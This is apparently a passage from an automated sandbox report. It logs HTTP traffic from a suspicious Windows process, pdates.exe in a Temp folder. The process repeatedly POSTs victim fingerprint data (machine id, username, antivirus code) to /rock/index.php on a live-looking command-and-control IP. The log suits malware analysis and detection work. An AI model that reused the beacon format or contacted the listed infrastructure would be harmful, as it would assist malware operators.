Jul 27, 2023 01:33:10.719788074 CEST	2869	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jul 2023 23:33:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 403 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 37 37 2e 39 31 2e 36 38 2e 32 39 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 77.91.68.29 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
350	192.168.2.5	50070	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:36.920118093 CEST	3962	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:36.968127966 CEST	3962	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
351	192.168.2.5	50071	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:37.129117966 CEST	3964	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:37.177757978 CEST	3965	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
352	192.168.2.5	50072	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:37.333655119 CEST	3966	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:37.382258892 CEST	3966	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
353	192.168.2.5	50073	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:37.545041084 CEST	3967	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:37.593189001 CEST	3967	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
354	192.168.2.5	50074	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:37.752238989 CEST	3968	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:37.800489902 CEST	3968	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
355	192.168.2.5	50075	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:37.956454039 CEST	3969	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:38.005697966 CEST	3969	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
356	192.168.2.5	50076	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:38.190258980 CEST	3970	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:38.240211010 CEST	3970	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
357	192.168.2.5	50077	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:38.401947021 CEST	3970	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:38.450817108 CEST	3971	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
358	192.168.2.5	50078	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:38.656409025 CEST	3971	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:38.704396009 CEST	3972	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
359	192.168.2.5	50079	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:38.872143984 CEST	3972	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:38.921724081 CEST	3973	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.5	49752	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:10.843250990 CEST	2870	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:10.891763926 CEST	2870	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
360	192.168.2.5	50080	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:39.081033945 CEST	3973	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:39.131048918 CEST	3974	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
361	192.168.2.5	50081	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:39.294378042 CEST	3974	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:39.343039036 CEST	3975	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
362	192.168.2.5	50082	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:39.526468039 CEST	3975	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:39.575511932 CEST	3976	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
363	192.168.2.5	50083	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:39.740684032 CEST	3976	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:39.788255930 CEST	3976	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
364	192.168.2.5	50084	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:39.937131882 CEST	3977	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:39.985275984 CEST	3977	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
365	192.168.2.5	50085	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:40.174154997 CEST	3978	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:40.223193884 CEST	3978	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
366	192.168.2.5	50086	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:40.381000996 CEST	3979	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:40.429164886 CEST	3979	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
367	192.168.2.5	50087	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:40.588028908 CEST	3980	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:40.636909008 CEST	3980	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
368	192.168.2.5	50088	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:40.827960968 CEST	3981	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:40.876207113 CEST	3981	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
369	192.168.2.5	50089	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:41.050780058 CEST	3982	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:41.100537062 CEST	3982	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.5	49753	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
